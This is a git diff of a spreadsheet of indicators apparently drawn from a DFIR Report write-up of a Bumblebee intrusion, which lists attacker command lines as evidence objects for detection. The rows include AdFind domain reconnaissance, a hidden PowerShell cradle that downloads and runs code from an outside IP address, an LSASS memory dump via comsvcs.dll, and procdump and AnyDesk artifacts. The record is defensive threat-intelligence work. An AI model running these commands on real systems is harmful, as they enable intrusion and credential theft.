--- a/delta2/lib_e/dfir_osir/dfir_20220808.xlsx
+++ b/delta2/lib_e/dfir_osir/dfir_20220808.xlsx
@@ -8,7 +8,7 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_e/dfir_osir/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{780AE982-EDC6-2846-9A64-917E2FAA927E}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{E2561D5C-1E82-044A-8ED2-C14DCEB8DD80}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
     <workbookView xWindow="0" yWindow="760" windowWidth="34560" windowHeight="21580" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
   </bookViews>
@@ -564,7 +564,7 @@
   <dimension ref="A1:F11"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0">
-      <selection activeCell="F2" sqref="F2"/>
+      <selection activeCell="D2" sqref="D2"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>

--- a/delta2/lib_e/dfir_osir/dfir_20220808.xlsx
+++ b/delta2/lib_e/dfir_osir/dfir_20220808.xlsx
@@ -8,9 +8,9 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_e/dfir_osir/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{E2561D5C-1E82-044A-8ED2-C14DCEB8DD80}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{C6D30A05-AC38-7F47-9F8F-ABABF55EDD6A}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="0" yWindow="760" windowWidth="34560" windowHeight="21580" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
+    <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
   </bookViews>
   <sheets>
     <sheet name="sheet1" sheetId="1" r:id="rId1"/>
@@ -36,7 +36,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="56" uniqueCount="36">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="55" uniqueCount="33">
   <si>
     <t>evidence_object</t>
   </si>
@@ -53,16 +53,19 @@
     <t>map_pid</t>
   </si>
   <si>
-    <t>{"process_command_line": r'''adfind.exe -gcb -sc trustdmp &gt; trustdmp.txt'''}</t>
-  </si>
-  <si>
-    <t>{"process_command_line": r'''adfind.exe -sc dclist &gt; dclist.txt'''}</t>
-  </si>
-  <si>
-    <t>{"process_command_line": r'''adfind.exe -sc domainlist &gt; domainlist.txt'''}</t>
-  </si>
-  <si>
-    <t>{"process_command_line": r'''adfind.exe -sc computers_pwdnotreqs &gt; computers_pwdnotreqd.txt'''}</t>
+    <t>{"date": "2022-08-08" , "url": "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/"}</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0001</t>
+  </si>
+  <si>
+    <t>open source intel report</t>
+  </si>
+  <si>
+    <t>{"process_command_line": r'''adFind.exe -f "(objectcategory=organizationalUnit)" &gt; ad_ous.txt'''}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": r'''af.exe -sc trustdmp &gt; trustdmp.txt'''}</t>
   </si>
   <si>
     <t>{"process_command_line": r'''adfind.exe -f "objectcategory=computer" &gt; ad_computers.txt'''}</t>
@@ -71,79 +74,67 @@
     <t>{"process_command_line": r'''adfind.exe -f "objectcategory=person" &gt; ad_users.txt'''}</t>
   </si>
   <si>
-    <t>{"process_command_line": r'''adfind.exe -f "(objectcategory=subnet)" &gt; subnets.txt'''}</t>
+    <t>{"process_command_line": r'''af.exe -f "objectcategory=computer" &gt; ad_computers.txt'''}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": r'''af.exe -f "objectcategory=person" &gt; ad_users.txt'''}</t>
   </si>
   <si>
     <t xml:space="preserve"> {"process_command_line": r'''adfind.exe -sc trustdmp &gt; trustdmp.txt'''}</t>
   </si>
   <si>
-    <t xml:space="preserve"> {"process_command_line": r'''adfind.exe -sc dcmodes  &gt; dcmodes.txt'''}</t>
-  </si>
-  <si>
-    <t>{"date": "2020-05-08" , "url": "https://thedfirreport.com/2020/05/08/adfind-recon/"}</t>
-  </si>
-  <si>
-    <t>dfir20220508-eid0001</t>
-  </si>
-  <si>
-    <t>dfir20220508-eid0002</t>
-  </si>
-  <si>
-    <t>dfir20220508-eid0003</t>
-  </si>
-  <si>
-    <t>dfir20220508-eid0004</t>
-  </si>
-  <si>
-    <t>dfir20220508-eid0005</t>
-  </si>
-  <si>
-    <t>dfir20220508-eid0006</t>
-  </si>
-  <si>
-    <t>dfir20220508-eid0007</t>
-  </si>
-  <si>
-    <t>dfir20220508-eid0008</t>
-  </si>
-  <si>
-    <t>dfir20220508-eid0009</t>
-  </si>
-  <si>
-    <t>dfir20220508-eid0010</t>
-  </si>
-  <si>
-    <t>open source intel report</t>
-  </si>
-  <si>
-    <t>["adfrind-pid0002", "adfind-pid0009"]</t>
-  </si>
-  <si>
-    <t>["adfrind-pid0003", "adfind-pid0009"]</t>
-  </si>
-  <si>
-    <t>["adfrind-pid0004", "adfind-pid0009"]</t>
-  </si>
-  <si>
-    <t>["adfrind-pid0006", "adfind-pid0009"]</t>
-  </si>
-  <si>
-    <t>["adfrind-pid0008", "adfind-pid0009"]</t>
-  </si>
-  <si>
-    <t>["adfrind-pid0002", "adfind-pid0010"]</t>
-  </si>
-  <si>
-    <t>["adfrind-pid0011", "adfind-pid0009"]</t>
-  </si>
-  <si>
-    <t>["adfrind-pid0012", "adfind-pid0009"]</t>
-  </si>
-  <si>
-    <t xml:space="preserve"> {"process_command_line": r'''adfind.exe -sc adinfo  &gt; adinfo.txt'''}</t>
+    <t xml:space="preserve"> {"process_command_line": r'''C:\Windows\System32\cmd.exe /c start rundll32 namr.dll,IternalJob'''}</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> {"process_command_line": r'''C:\Windows\system32\cmd.exe /C powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://104.243.33.50:80/a'))"'''}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": "cmd.exe /C rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 968 C:\ProgramData\REDACTED\lsass.dmp full"}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": "C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc"}</t>
   </si>
   <si>
     <t>description</t>
+  </si>
+  <si>
+    <t>cobalt stike injection</t>
+  </si>
+  <si>
+    <t>map_did</t>
+  </si>
+  <si>
+    <t>process_create-windows_any</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0002</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0003</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0004</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0005</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0006</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0007</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0008</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0009</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0010</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0011</t>
   </si>
 </sst>
 </file>
@@ -194,7 +185,10 @@
   <cellStyles count="1">
     <cellStyle name="Normal" xfId="0" builtinId="0"/>
   </cellStyles>
-  <dxfs count="7">
+  <dxfs count="8">
+    <dxf>
+      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
+    </dxf>
     <dxf>
       <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
     </dxf>
@@ -230,15 +224,16 @@
 </file>
 
 <file path=xl/tables/table1.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}" name="Table1" displayName="Table1" ref="A1:F11" totalsRowShown="0" dataDxfId="6">
-  <autoFilter ref="A1:F11" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}"/>
-  <tableColumns count="6">
-    <tableColumn id="7" xr3:uid="{5516EDED-B058-144E-976C-0B23FABA65AE}" name="eid" dataDxfId="5"/>
-    <tableColumn id="4" xr3:uid="{0B947D48-DA4A-7C49-9C7F-01EFE6AFBBF9}" name="map_pid" dataDxfId="4"/>
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}" name="Table1" displayName="Table1" ref="A1:G12" totalsRowShown="0" dataDxfId="7">
+  <autoFilter ref="A1:G12" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}"/>
+  <tableColumns count="7">
+    <tableColumn id="7" xr3:uid="{5516EDED-B058-144E-976C-0B23FABA65AE}" name="eid" dataDxfId="6"/>
+    <tableColumn id="4" xr3:uid="{0B947D48-DA4A-7C49-9C7F-01EFE6AFBBF9}" name="map_pid" dataDxfId="5"/>
+    <tableColumn id="3" xr3:uid="{8046B7CB-F6C5-6D4E-BC1D-63FF3DD3D5BF}" name="map_did" dataDxfId="4"/>
     <tableColumn id="1" xr3:uid="{1ED6D649-59BA-E14C-BBA6-23BD7EBDEB94}" name="source_type" dataDxfId="3"/>
     <tableColumn id="5" xr3:uid="{EB72065A-5D22-8549-8CE0-1A9677239F1C}" name="non_standard_meta" dataDxfId="2"/>
     <tableColumn id="6" xr3:uid="{16A9BF58-E113-7848-AEB0-6F8A9E864CF3}" name="evidence_object" dataDxfId="1"/>
-    <tableColumn id="2" xr3:uid="{8FCACD48-C531-3247-B77F-427AC991055E}" name="description" dataDxfId="0"/>
+    <tableColumn id="2" xr3:uid="{207EDF8E-E395-1D42-A573-5F5B69D0FCE9}" name="description" dataDxfId="0"/>
   </tableColumns>
   <tableStyleInfo name="TableStyleMedium15" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
 </table>
@@ -561,23 +556,24 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{CADA5849-2682-F643-8842-EFF560F6FB5C}">
-  <dimension ref="A1:F11"/>
+  <dimension ref="A1:G12"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0">
-      <selection activeCell="D2" sqref="D2"/>
+      <selection activeCell="A2" sqref="A2:A12"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
   <cols>
-    <col min="1" max="1" width="19.1640625" bestFit="1" customWidth="1"/>
-    <col min="2" max="2" width="17.83203125" customWidth="1"/>
-    <col min="3" max="3" width="15" bestFit="1" customWidth="1"/>
-    <col min="4" max="4" width="71.6640625" customWidth="1"/>
-    <col min="5" max="5" width="134.1640625" customWidth="1"/>
-    <col min="6" max="6" width="27.83203125" customWidth="1"/>
+    <col min="1" max="1" width="21.1640625" customWidth="1"/>
+    <col min="2" max="2" width="21.5" customWidth="1"/>
+    <col min="3" max="3" width="14.33203125" bestFit="1" customWidth="1"/>
+    <col min="4" max="4" width="13.6640625" bestFit="1" customWidth="1"/>
+    <col min="5" max="5" width="72.6640625" customWidth="1"/>
+    <col min="6" max="6" width="143.33203125" customWidth="1"/>
+    <col min="7" max="7" width="31.5" customWidth="1"/>
   </cols>
   <sheetData>
-    <row r="1" spans="1:6" x14ac:dyDescent="0.2">
+    <row r="1" spans="1:7" x14ac:dyDescent="0.2">
       <c r="A1" t="s">
         <v>2</v>
       </c>
@@ -585,197 +581,215 @@
         <v>4</v>
       </c>
       <c r="C1" t="s">
+        <v>21</v>
+      </c>
+      <c r="D1" t="s">
         <v>3</v>
       </c>
-      <c r="D1" t="s">
+      <c r="E1" t="s">
         <v>1</v>
       </c>
-      <c r="E1" t="s">
+      <c r="F1" t="s">
         <v>0</v>
       </c>
-      <c r="F1" t="s">
-        <v>35</v>
-      </c>
-    </row>
-    <row r="2" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="G1" t="s">
+        <v>19</v>
+      </c>
+    </row>
+    <row r="2" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A2" s="1" t="s">
-        <v>15</v>
-      </c>
-      <c r="B2" s="1" t="s">
-        <v>26</v>
-      </c>
+        <v>6</v>
+      </c>
+      <c r="B2" s="1"/>
       <c r="C2" s="1" t="s">
-        <v>25</v>
+        <v>22</v>
       </c>
       <c r="D2" s="1" t="s">
-        <v>14</v>
+        <v>7</v>
       </c>
       <c r="E2" s="1" t="s">
         <v>5</v>
       </c>
-      <c r="F2" s="1"/>
-    </row>
-    <row r="3" spans="1:6" ht="34" x14ac:dyDescent="0.2">
+      <c r="F2" s="1" t="s">
+        <v>8</v>
+      </c>
+      <c r="G2" s="1"/>
+    </row>
+    <row r="3" spans="1:7" ht="34" x14ac:dyDescent="0.2">
       <c r="A3" s="1" t="s">
+        <v>23</v>
+      </c>
+      <c r="B3" s="1"/>
+      <c r="C3" s="1" t="s">
+        <v>22</v>
+      </c>
+      <c r="D3" s="1" t="s">
+        <v>7</v>
+      </c>
+      <c r="E3" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F3" s="1" t="s">
+        <v>9</v>
+      </c>
+      <c r="G3" s="1"/>
+    </row>
+    <row r="4" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A4" s="1" t="s">
+        <v>24</v>
+      </c>
+      <c r="B4" s="1"/>
+      <c r="C4" s="1" t="s">
+        <v>22</v>
+      </c>
+      <c r="D4" s="1" t="s">
+        <v>7</v>
+      </c>
+      <c r="E4" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F4" s="1" t="s">
+        <v>10</v>
+      </c>
+      <c r="G4" s="1"/>
+    </row>
+    <row r="5" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A5" s="1" t="s">
+        <v>25</v>
+      </c>
+      <c r="B5" s="1"/>
+      <c r="C5" s="1" t="s">
+        <v>22</v>
+      </c>
+      <c r="D5" s="1" t="s">
+        <v>7</v>
+      </c>
+      <c r="E5" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F5" s="1" t="s">
+        <v>11</v>
+      </c>
+      <c r="G5" s="1"/>
+    </row>
+    <row r="6" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A6" s="1" t="s">
+        <v>26</v>
+      </c>
+      <c r="B6" s="1"/>
+      <c r="C6" s="1" t="s">
+        <v>22</v>
+      </c>
+      <c r="D6" s="1" t="s">
+        <v>7</v>
+      </c>
+      <c r="E6" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F6" s="1" t="s">
+        <v>12</v>
+      </c>
+      <c r="G6" s="1"/>
+    </row>
+    <row r="7" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A7" s="1" t="s">
+        <v>27</v>
+      </c>
+      <c r="B7" s="1"/>
+      <c r="C7" s="1" t="s">
+        <v>22</v>
+      </c>
+      <c r="D7" s="1" t="s">
+        <v>7</v>
+      </c>
+      <c r="E7" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F7" s="1" t="s">
+        <v>13</v>
+      </c>
+      <c r="G7" s="1"/>
+    </row>
+    <row r="8" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A8" s="1" t="s">
+        <v>28</v>
+      </c>
+      <c r="B8" s="1"/>
+      <c r="C8" s="1" t="s">
+        <v>22</v>
+      </c>
+      <c r="D8" s="1" t="s">
+        <v>7</v>
+      </c>
+      <c r="E8" s="1" t="s">
+        <v>5</v>
+      </c>
+      <c r="F8" s="1" t="s">
+        <v>14</v>
+      </c>
+      <c r="G8" s="1"/>
+    </row>
+    <row r="9" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A9" s="1" t="s">
+        <v>29</v>
+      </c>
+      <c r="B9" s="1"/>
+      <c r="C9" s="1" t="s">
+        <v>22</v>
+      </c>
+      <c r="D9" s="1"/>
+      <c r="E9" s="1"/>
+      <c r="F9" s="1" t="s">
+        <v>15</v>
+      </c>
+      <c r="G9" s="1"/>
+    </row>
+    <row r="10" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A10" s="1" t="s">
+        <v>30</v>
+      </c>
+      <c r="B10" s="1"/>
+      <c r="C10" s="1" t="s">
+        <v>22</v>
+      </c>
+      <c r="D10" s="1"/>
+      <c r="E10" s="1"/>
+      <c r="F10" s="1" t="s">
         <v>16</v>
       </c>
-      <c r="B3" s="1" t="s">
-        <v>27</v>
-      </c>
-      <c r="C3" s="1" t="s">
-        <v>25</v>
-      </c>
-      <c r="D3" s="1" t="s">
-        <v>14</v>
-      </c>
-      <c r="E3" s="1" t="s">
-        <v>6</v>
-      </c>
-      <c r="F3" s="1"/>
-    </row>
-    <row r="4" spans="1:6" ht="34" x14ac:dyDescent="0.2">
-      <c r="A4" s="1" t="s">
+      <c r="G10" s="1"/>
+    </row>
+    <row r="11" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A11" s="1" t="s">
+        <v>31</v>
+      </c>
+      <c r="B11" s="1"/>
+      <c r="C11" s="1" t="s">
+        <v>22</v>
+      </c>
+      <c r="D11" s="1"/>
+      <c r="E11" s="1"/>
+      <c r="F11" s="1" t="s">
         <v>17</v>
       </c>
-      <c r="B4" s="1" t="s">
-        <v>28</v>
-      </c>
-      <c r="C4" s="1" t="s">
-        <v>25</v>
-      </c>
-      <c r="D4" s="1" t="s">
-        <v>14</v>
-      </c>
-      <c r="E4" s="1" t="s">
-        <v>7</v>
-      </c>
-      <c r="F4" s="1"/>
-    </row>
-    <row r="5" spans="1:6" ht="34" x14ac:dyDescent="0.2">
-      <c r="A5" s="1" t="s">
+      <c r="G11" s="1"/>
+    </row>
+    <row r="12" spans="1:7" ht="34" x14ac:dyDescent="0.2">
+      <c r="A12" s="1" t="s">
+        <v>32</v>
+      </c>
+      <c r="B12" s="1"/>
+      <c r="C12" s="1" t="s">
+        <v>22</v>
+      </c>
+      <c r="D12" s="1"/>
+      <c r="E12" s="1"/>
+      <c r="F12" s="1" t="s">
         <v>18</v>
       </c>
-      <c r="B5" s="1" t="s">
-        <v>29</v>
-      </c>
-      <c r="C5" s="1" t="s">
-        <v>25</v>
-      </c>
-      <c r="D5" s="1" t="s">
-        <v>14</v>
-      </c>
-      <c r="E5" s="1" t="s">
-        <v>8</v>
-      </c>
-      <c r="F5" s="1"/>
-    </row>
-    <row r="6" spans="1:6" ht="34" x14ac:dyDescent="0.2">
-      <c r="A6" s="1" t="s">
-        <v>19</v>
-      </c>
-      <c r="B6" s="1" t="s">
-        <v>30</v>
-      </c>
-      <c r="C6" s="1" t="s">
-        <v>25</v>
-      </c>
-      <c r="D6" s="1" t="s">
-        <v>14</v>
-      </c>
-      <c r="E6" s="1" t="s">
-        <v>9</v>
-      </c>
-      <c r="F6" s="1"/>
-    </row>
-    <row r="7" spans="1:6" ht="34" x14ac:dyDescent="0.2">
-      <c r="A7" s="1" t="s">
+      <c r="G12" s="1" t="s">
         <v>20</v>
       </c>
-      <c r="B7" s="1" t="s">
-        <v>30</v>
-      </c>
-      <c r="C7" s="1" t="s">
-        <v>25</v>
-      </c>
-      <c r="D7" s="1" t="s">
-        <v>14</v>
-      </c>
-      <c r="E7" s="1" t="s">
-        <v>10</v>
-      </c>
-      <c r="F7" s="1"/>
-    </row>
-    <row r="8" spans="1:6" ht="34" x14ac:dyDescent="0.2">
-      <c r="A8" s="1" t="s">
-        <v>21</v>
-      </c>
-      <c r="B8" s="1" t="s">
-        <v>31</v>
-      </c>
-      <c r="C8" s="1" t="s">
-        <v>25</v>
-      </c>
-      <c r="D8" s="1" t="s">
-        <v>14</v>
-      </c>
-      <c r="E8" s="1" t="s">
-        <v>11</v>
-      </c>
-      <c r="F8" s="1"/>
-    </row>
-    <row r="9" spans="1:6" ht="34" x14ac:dyDescent="0.2">
-      <c r="A9" s="1" t="s">
-        <v>22</v>
-      </c>
-      <c r="B9" s="1" t="s">
-        <v>26</v>
-      </c>
-      <c r="C9" s="1" t="s">
-        <v>25</v>
-      </c>
-      <c r="D9" s="1" t="s">
-        <v>14</v>
-      </c>
-      <c r="E9" s="1" t="s">
-        <v>12</v>
-      </c>
-      <c r="F9" s="1"/>
-    </row>
-    <row r="10" spans="1:6" ht="34" x14ac:dyDescent="0.2">
-      <c r="A10" s="1" t="s">
-        <v>23</v>
-      </c>
-      <c r="B10" s="1" t="s">
-        <v>32</v>
-      </c>
-      <c r="C10" s="1" t="s">
-        <v>25</v>
-      </c>
-      <c r="D10" s="1" t="s">
-        <v>14</v>
-      </c>
-      <c r="E10" s="1" t="s">
-        <v>13</v>
-      </c>
-      <c r="F10" s="1"/>
-    </row>
-    <row r="11" spans="1:6" ht="34" x14ac:dyDescent="0.2">
-      <c r="A11" s="1" t="s">
-        <v>24</v>
-      </c>
-      <c r="B11" s="1" t="s">
-        <v>33</v>
-      </c>
-      <c r="C11" s="1" t="s">
-        <v>25</v>
-      </c>
-      <c r="D11" s="1" t="s">
-        <v>14</v>
-      </c>
-      <c r="E11" s="1" t="s">
-        <v>34</v>
-      </c>
-      <c r="F11" s="1"/>
     </row>
   </sheetData>
   <phoneticPr fontId="1" type="noConversion"/>

--- a/delta2/lib_e/dfir_osir/dfir_20220808.xlsx
+++ b/delta2/lib_e/dfir_osir/dfir_20220808.xlsx
@@ -8,9 +8,9 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_e/dfir_osir/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{C6D30A05-AC38-7F47-9F8F-ABABF55EDD6A}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{D689297E-3F03-C347-B234-4932579098D7}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
+    <workbookView xWindow="38400" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
   </bookViews>
   <sheets>
     <sheet name="sheet1" sheetId="1" r:id="rId1"/>
@@ -36,7 +36,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="55" uniqueCount="33">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="438" uniqueCount="227">
   <si>
     <t>evidence_object</t>
   </si>
@@ -62,27 +62,6 @@
     <t>open source intel report</t>
   </si>
   <si>
-    <t>{"process_command_line": r'''adFind.exe -f "(objectcategory=organizationalUnit)" &gt; ad_ous.txt'''}</t>
-  </si>
-  <si>
-    <t>{"process_command_line": r'''af.exe -sc trustdmp &gt; trustdmp.txt'''}</t>
-  </si>
-  <si>
-    <t>{"process_command_line": r'''adfind.exe -f "objectcategory=computer" &gt; ad_computers.txt'''}</t>
-  </si>
-  <si>
-    <t>{"process_command_line": r'''adfind.exe -f "objectcategory=person" &gt; ad_users.txt'''}</t>
-  </si>
-  <si>
-    <t>{"process_command_line": r'''af.exe -f "objectcategory=computer" &gt; ad_computers.txt'''}</t>
-  </si>
-  <si>
-    <t>{"process_command_line": r'''af.exe -f "objectcategory=person" &gt; ad_users.txt'''}</t>
-  </si>
-  <si>
-    <t xml:space="preserve"> {"process_command_line": r'''adfind.exe -sc trustdmp &gt; trustdmp.txt'''}</t>
-  </si>
-  <si>
     <t xml:space="preserve"> {"process_command_line": r'''C:\Windows\System32\cmd.exe /c start rundll32 namr.dll,IternalJob'''}</t>
   </si>
   <si>
@@ -135,6 +114,616 @@
   </si>
   <si>
     <t>dfir20220808-eid0011</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> {"obj_type": "file_create", "initiating_process_command_line": r'''C:\Windows\System32\cmd.exe /c start rundll32 namr.dll,IternalJob'''}</t>
+  </si>
+  <si>
+    <t>{"service_file_name": r'''"C:\Program Files (x86)\Microsoft\AnyDeskt\AnyDesk.exe" --service'''</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0012</t>
+  </si>
+  <si>
+    <t>dfir20220808-eid0013</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> {"obj_type": "file_create", "file_path": r'''&lt;workstationfqdn&gt;\C$\programdata\procdump64.exe''', "initiating_process_command_line": "rundll32.exe"}</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> {"obj_type": "file_create", "file_path": r'''&lt;workstationfqdn&gt;\C$\programdata\procdump.exe''', "initiating_process_command_line": "rundll32.exe"}}</t>
+  </si>
+  <si>
+    <t>{"initiating_process_command_line": "C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc", "process_command_line": r'''C:\Windows\system32\cmd.exe /C /time'''}</t>
+  </si>
+  <si>
+    <t>{"initiating_process_command_line": "C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc", "process_command_line": r'''C:\Windows\system32\cmd.exe /C adfind.exe -f "(objectcategory=person)" &gt; u.txt'''}</t>
+  </si>
+  <si>
+    <t>{"initiating_process_command_line": "C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc", "process_command_line": r'''C:\Windows\system32\cmd.exe /C adfind.exe -f "objectcategory=computer" &gt; c.txt'''}</t>
+  </si>
+  <si>
+    <t>{"initiating_process_command_line": "C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc", "process_command_line": r'''C:\Windows\system32\cmd.exe /C adfind.exe -sc trustdmp  &gt; t.txt'''}</t>
+  </si>
+  <si>
+    <t>{"initiating_process_command_line": "C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc", "process_command_line": r'''C:\Windows\system32\cmd.exe /C getsystem'''}</t>
+  </si>
+  <si>
+    <t>{"initiating_process_command_line": "C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc", "process_command_line": r'''C:\Windows\system32\cmd.exe /C cmd.exe /C rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 968 C:\ProgramData\REDACTED\lsass.dmp full'''}</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> {"process_command_line": r'''adfind.exe -sc trustdmp &gt; trustdmp.txt''', "initiating_process_commandline": "rundll32.exe"}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": r'''adFind.exe -f "(objectcategory=organizationalUnit)" &gt; ad_ous.txt''',  "initiating_process_commandline": "rundll32.exe"}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": r'''adfind.exe -f "objectcategory=computer" &gt; ad_computers.txt''',  "initiating_process_commandline": "rundll32.exe"}</t>
+  </si>
+  <si>
+    <t>{"process_command_line": r'''adfind.exe -f "objectcategory=person" &gt; ad_users.txt''',  "initiating_process_commandline": "rundll32.exe"}</t>
+  </si>
+  <si>
